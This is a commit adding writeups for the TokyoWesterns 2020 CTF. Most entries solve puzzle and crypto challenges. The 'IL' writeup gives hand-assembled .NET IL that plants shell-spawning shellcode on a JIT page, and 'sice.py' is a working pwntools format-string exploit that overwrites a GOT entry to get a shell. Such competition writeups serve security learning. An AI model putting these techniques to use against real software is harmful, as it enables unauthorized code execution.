Add twctf2020 writeups

Author: jaybosamiya

twctf2020/README.md

@@ -0,0 +1 @@
+Writeups for TokyoWesterns 2020 CTF, held from September 18 to 20, 2020.

twctf2020/angular-of-another-universe/README.md

@@ -0,0 +1,3 @@
+# Angular of Another Universe | 239 points/8 solves
+
+The solution for this problem is given on [one of the slides for flag 1 of "Angular of the Universe"](https://docs.google.com/presentation/d/1y1Ygcddx8zLs3d5nPRmfGxB7xsvZnVzQqham9XynF-I/edit#slide=id.g9b40b4acdf_0_17).

twctf2020/angular-of-the-universe/README.md

@@ -0,0 +1,3 @@
+# Angular of the Universe | 139 points/39 solves + 149 points/34 solves
+
+This writeup is available in slideshow format: [here](https://docs.google.com/presentation/d/1y1Ygcddx8zLs3d5nPRmfGxB7xsvZnVzQqham9XynF-I/edit#slide=id.g9b188a9c64_0_256) for flag 1 and [here](https://docs.google.com/presentation/d/1y1Ygcddx8zLs3d5nPRmfGxB7xsvZnVzQqham9XynF-I/edit#slide=id.g9b458d03f3_4_0) for flag 2.

twctf2020/bfnote/README.md

@@ -0,0 +1,3 @@
+# bfnote | Web, 320 points/18 solves
+
+This writeup is available in slideshow format [here](https://docs.google.com/presentation/d/1y1Ygcddx8zLs3d5nPRmfGxB7xsvZnVzQqham9XynF-I/edit#slide=id.g9b40b4acdf_0_307).

twctf2020/birds/README.md

@@ -0,0 +1,57 @@
+In the beginning, we are given the following text and told that the flag forms
+a sentence:
+
+```
+BC552
+AC849
+JL106
+PQ448
+JL901
+LH908
+NH2177
+```
+
+Each of these numbers appears to be an airline flight number, which Google
+searches confirm. There isn't much information about each flight, but we do
+notice a pattern where many of the origin locations match up with destinations
+of other flights.
+
+```
+BC552:  OKA -> NGO
+AC849:  LHR -> YYZ
+JL106:  ITM -> HND
+PQ448:  TBS -> ODS
+JL901:  HND -> OKA
+LH908:  FRA -> LHR
+NH2177: NRT -> ITM
+```
+
+We then rearrange the flights into chains where the source and destination
+airports match.
+
+```
+NRT -> ITM -> HND -> OKA -> NGO
+LHR -> YYZ
+TBS -> ODS
+FRA -> LHR
+```
+
+Taking the first letter of each gives some fragments of words:
+
+```
+NIHON LY TO FL
+```
+
+Keeping with the theme of flying, we can rearrange (and smoosh two "L"s
+together) to get the required "sentenece":
+
+```
+FLY TO NIHON
+```
+
+Finally, since we know that the flag is all capital letters with no spaces
+as-per the challenge hint, we get:
+
+```
+TWCTF{FLYTONIHON}
+```

twctf2020/circular/README.md

@@ -0,0 +1,37 @@
+We are given Ruby code and a server.
+
+Examining `keygen.rb`, we can see a secure 2048-bit modulus along with a 2048-bit `k` value.
+```
+p = OpenSSL::BN.generate_prime(1024)
+q = OpenSSL::BN.generate_prime(1024)
+k = OpenSSL::BN.generate_prime(2048, false)
+n = p * q
+File.write("pubkey.txt", { n: n.to_s, k: k.to_s }.to_json)
+```
+
+`app.rb` contains the actual encryption code:
+```
+EXPECTED_MESSAGE = 'SUNSHINE RHYTHM'
+...
+x = data["x"].to_i
+y = data["y"].to_i
+msg = data["msg"].to_s
+hash = ""
+4.times do |i|
+  hash += Digest::SHA512.hexdigest(msg + i.to_s)
+end
+hash = hash.to_i(16) % n
+signature = (x ** 2 + k * y ** 2) % n
+
+if signature == hash
+  if msg == EXPECTED_MESSAGE
+    return { result: ENV["FLAG"] }
+```
+
+We need to provide a `x` and `y` value such that `(x**2 + k*y**2) % n` evaluates to a hash.
+
+The hash is generated by taking the SHA512 hash of a fixed message modified slighly at the end each time and appending it throughout. This isn't reversible in any case, so we can just focus on the end result hash and ignore the hashing process.
+
+We can find an algorithm to solve equations of the form `(x**2 + k*y**2) = m % n` in this paper by Pollard and Schnorr [here](https://ieeexplore.ieee.org/document/1057350/).
+
+Implementing this, we can use given `n`,`k`,`hash` values to get a valid `x` and `y` for the server and get the flag: `TWCTF{dbodfs-dbqsjdpso-mjcsb-mfp}`

twctf2020/easy-hash/README.md

@@ -0,0 +1,15 @@
+Examining the source code, we can see it implements some custom hash function:
+```
+def easy_hash(x):
+    m = 0
+    for i in range(len(x) - 3):
+        m += struct.unpack('<I', x[i:i + 4])[0]
+        m = m & 0xffffffff
+    return m
+```
+
+The goal of the challenge seems to be to find a message that hashes to the same hash as `MSG`'s hash (second-preimage).
+
+Note that in the `easy_hash` function, it adds one character at a time: `struct.unpack('<I', x[i:i + 4])[0]`. We can just add a null byte in the middle of `MSG`, so when hashed, 0 will be added and won't affect the final result.
+
+Sending request with this new message, we get the flag: `TWCTF{colorfully_decorated_dream}`

twctf2020/il/readme.md

@@ -0,0 +1,99 @@
+## IL - pwn - 379 points (10 solves)
+
+### Problem
+
+We're given a Linux binary called `il`, which is a .NET Core stub program that loads a .NET assembly called `il.dll`. We can use dnSpy to decompile `il.dll`. It's very simple: all it does is read up to 2053 bytes of data from `stdin` (base64-encoded), then write those bytes into a specific offset of another .NET assembly called `ilstub.dll`. It then loads the modified binary using `Assembly.load`, grabs the function `IlStub.Stub.Func`, and calls it with the argument `0x1337`.
+
+`ilstub.dll` is also a simple .NET assembly containined the aforementioned function. We can see that the user's input bytes are written directly into the IL bytecode of `IlStub.Stub.Func`. Therefore, we're basically being asked to write some .NET IL code which will read a flag or pop a shell.
+
+### Solution
+
+We discovered that we can use `unsafe` opcodes, as long as they otherwise pass the bytecode verifier (don't use too much stack, don't operate on the wrong types, don't unbalance the stack, etc.). Unsafe opcodes, as the name implies, are opcodes which allow you to read or write through addresses (rather than through references, as safe code would), and therefore completely break the memory safety of the .NET runtime.
+
+It also turns out that the code is fully JITted, which means that there's a lot of `rwx` pages where we could just write shellcode. We have a handy opcode called `ldarga` which loads the address of an argument - a stack address. From `gdb`, we could see that this address was 2 qwords below the saved return address - and the saved return address points to another `rwx` page! So our plan is very simple: use `ldarga` to get the stack address, offset it to point to the return address, load the return address, and write shellcode there. Upon returning, our shellcode would run.
+
+Due to struggles with `ilasm` during the competition, we ended up just manually assembling the exploit into hex:
+
+```
+0f 00
+; add 8 twice
+1e 6e 58
+1e 6e 58
+; deref stack slot
+4c
+; write shellcode (dup, ldc.i4, stind.i, then add 4)
+25 20 488d 3df9 df 1a 6e 58
+25 20 ffff ff48 df 1a 6e 58
+25 20 83c7 1531 df 1a 6e 58
+25 20 f631 d231 df 1a 6e 58
+25 20 c0b0 3b0f df 1a 6e 58
+25 20 052f 6269 df 1a 6e 58
+25 20 6e2f 7368 df 1a 6e 58
+25 20 0000 0000 df 1a 6e 58
+; ret - shellcode executed
+2a
+```
+
+Here's how that looks in IL assembly:
+
+```
+	/* 0x0000025C 0F00         */ IL_0000: ldarga.s  arg
+	/* 0x0000025E 1E           */ IL_0002: ldc.i4.8
+	/* 0x0000025F 6E           */ IL_0003: conv.u8
+	/* 0x00000260 58           */ IL_0004: add
+	/* 0x00000261 1E           */ IL_0005: ldc.i4.8
+	/* 0x00000262 6E           */ IL_0006: conv.u8
+	/* 0x00000263 58           */ IL_0007: add
+	/* 0x00000264 4C           */ IL_0008: ldind.i8
+	/* 0x00000265 25           */ IL_0009: dup
+	/* 0x00000266 20488D3DF9   */ IL_000A: ldc.i4    -113406648
+	/* 0x0000026B DF           */ IL_000F: stind.i
+	/* 0x0000026C 1A           */ IL_0010: ldc.i4.4
+	/* 0x0000026D 6E           */ IL_0011: conv.u8
+	/* 0x0000026E 58           */ IL_0012: add
+	/* 0x0000026F 25           */ IL_0013: dup
+	/* 0x00000270 20FFFFFF48   */ IL_0014: ldc.i4    1224736767
+	/* 0x00000275 DF           */ IL_0019: stind.i
+	/* 0x00000276 1A           */ IL_001A: ldc.i4.4
+	/* 0x00000277 6E           */ IL_001B: conv.u8
+	/* 0x00000278 58           */ IL_001C: add
+	/* 0x00000279 25           */ IL_001D: dup
+	/* 0x0000027A 2083C71531   */ IL_001E: ldc.i4    823510915
+	/* 0x0000027F DF           */ IL_0023: stind.i
+	/* 0x00000280 1A           */ IL_0024: ldc.i4.4
+	/* 0x00000281 6E           */ IL_0025: conv.u8
+	/* 0x00000282 58           */ IL_0026: add
+	/* 0x00000283 25           */ IL_0027: dup
+	/* 0x00000284 20F631D231   */ IL_0028: ldc.i4    835858934
+	/* 0x00000289 DF           */ IL_002D: stind.i
+	/* 0x0000028A 1A           */ IL_002E: ldc.i4.4
+	/* 0x0000028B 6E           */ IL_002F: conv.u8
+	/* 0x0000028C 58           */ IL_0030: add
+	/* 0x0000028D 25           */ IL_0031: dup
+	/* 0x0000028E 20C0B03B0F   */ IL_0032: ldc.i4    255570112
+	/* 0x00000293 DF           */ IL_0037: stind.i
+	/* 0x00000294 1A           */ IL_0038: ldc.i4.4
+	/* 0x00000295 6E           */ IL_0039: conv.u8
+	/* 0x00000296 58           */ IL_003A: add
+	/* 0x00000297 25           */ IL_003B: dup
+	/* 0x00000298 20052F6269   */ IL_003C: ldc.i4    1768042245
+	/* 0x0000029D DF           */ IL_0041: stind.i
+	/* 0x0000029E 1A           */ IL_0042: ldc.i4.4
+	/* 0x0000029F 6E           */ IL_0043: conv.u8
+	/* 0x000002A0 58           */ IL_0044: add
+	/* 0x000002A1 25           */ IL_0045: dup
+	/* 0x000002A2 206E2F7368   */ IL_0046: ldc.i4    1752379246
+	/* 0x000002A7 DF           */ IL_004B: stind.i
+	/* 0x000002A8 1A           */ IL_004C: ldc.i4.4
+	/* 0x000002A9 6E           */ IL_004D: conv.u8
+	/* 0x000002AA 58           */ IL_004E: add
+	/* 0x000002AB 25           */ IL_004F: dup
+	/* 0x000002AC 2000000000   */ IL_0050: ldc.i4    0
+	/* 0x000002B1 DF           */ IL_0055: stind.i
+	/* 0x000002B2 1A           */ IL_0056: ldc.i4.4
+	/* 0x000002B3 6E           */ IL_0057: conv.u8
+	/* 0x000002B4 58           */ IL_0058: add
+	/* 0x000002B5 2A           */ IL_0059: ret
+```
+
+When run, we get a shell, so we can `cat flag.txt` to get our flag: `TWCTF{0n3_brINgS_5h4d0W_0nE_BRIng5_LighT}`

twctf2020/mask/README.md

@@ -0,0 +1,73 @@
+# Mask
+
+Misc, Score: 26, solved by 102 teams
+
+## Problem
+
+> 192.168.55.86/255.255.255.0
+> 192.168.80.198/255.255.255.128
+> 192.168.1.228/255.255.255.128
+> 192.168.90.68/255.255.254.0
+> 192.168.8.214/255.255.255.128
+> 192.168.5.197/255.255.255.128
+> 192.168.71.90/255.255.255.0
+> 192.168.62.55/255.255.255.192
+> 192.168.78.209/255.255.255.128
+> 192.168.76.216/255.255.255.128
+> 192.168.91.202/255.255.255.128
+> 192.168.93.108/255.255.255.0
+> 192.168.74.76/255.255.254.0
+> 192.168.10.88/255.255.254.0
+> 192.168.82.236/255.255.255.128
+> 192.168.13.246/255.255.255.128
+> 192.168.99.228/255.255.255.128
+> 192.168.68.83/255.255.252.0
+> 192.168.23.113/255.255.255.192
+> 192.168.52.113/255.255.255.192
+> 192.168.69.99/255.255.255.0
+> 192.168.19.114/255.255.255.192
+> 192.168.53.236/255.255.255.128
+> 192.168.90.117/255.255.254.0
+> 192.168.35.90/255.255.255.0
+> 192.168.91.121/255.255.255.0
+> 192.168.48.49/255.255.255.192
+> 192.168.27.104/255.255.255.0
+> 192.168.98.204/255.255.255.128
+> 192.168.93.87/255.255.255.0
+> 192.168.44.113/255.255.255.192
+> 192.168.40.104/255.255.248.0
+> 192.168.25.227/255.255.255.128
+> 192.168.57.50/255.255.255.192
+> 192.168.97.115/255.255.255.0
+> 192.168.30.47/255.255.255.192
+> 192.168.10.102/255.255.254.0
+> 192.168.51.209/255.255.255.128
+> 192.168.82.125/255.255.255.192
+> 192.168.72.125/255.255.255.192
+
+## Solution
+
+These are IPv4 addresses with masks. Applying the mask to find the
+unique value within the mask (i.e., bitwise-and of address with the
+bitwise-inverse of the mask) gives us ASCII characters, which can be
+base64 decoded to obtain the flag.
+
+```python
+x = """
+192.168.55.86/255.255.255.0
+...
+192.168.72.125/255.255.255.192
+"""
+
+def conv_num(x):
+    a, b, c, d = [int(a) for a in x.split('.')]
+    return ((a * 256 + b) * 256 + c) * 256 + d
+
+x = [list(map(conv_num, x.split('/'))) for x in x.strip().split('\n')]
+x = [a & ~b for a,b in x]
+x = list(map(chr, x))
+x = ''.join(x)
+x = x.decode('base64')
+
+print(repr(x))
+```

twctf2020/nothing-more-to-say/README.md

@@ -0,0 +1 @@
+Write shellcode to an executable stack using a `printf` format string exploit, then jump to it using GOT.

twctf2020/nothing-more-to-say/sice.py

@@ -0,0 +1,40 @@
+from pwn import *
+from pwnlib import shellcraft
+import time
+
+context.arch = 'amd64'
+context.log_level =  "debug"
+
+E = ELF("./nothing")
+#r = gdb.debug("./nothing")
+r = remote("pwn02.chal.ctf.westerns.tokyo", 18247)
+
+r.recvuntil("> ")
+
+def send_payload(data):
+	r.sendline(data)
+	time.sleep(1)
+	dat = r.recv()
+	return dat
+
+stack = int(send_payload("START%%%p$pEND").replace(b"START%",b"").replace(b"$pEND\n> ",b""), 16)
+
+format_string = FmtStr(execute_fmt=send_payload)
+
+shellcode = asm(shellcraft.amd64.linux.sh()) + b"\x00"*8
+target = stack-0x10000
+for i in range(0, len(shellcode), 8):
+	format_string.write(target+i, int.from_bytes(shellcode[i:i+8], "little"))
+	format_string.execute_writes()
+
+#format_string.write(E.got["printf"], target)
+print(hex(target))
+
+print("wrote shellcode")
+format_string.write(E.got["printf"], target)
+format_string.execute_writes()
+
+
+r.interactive()
+
+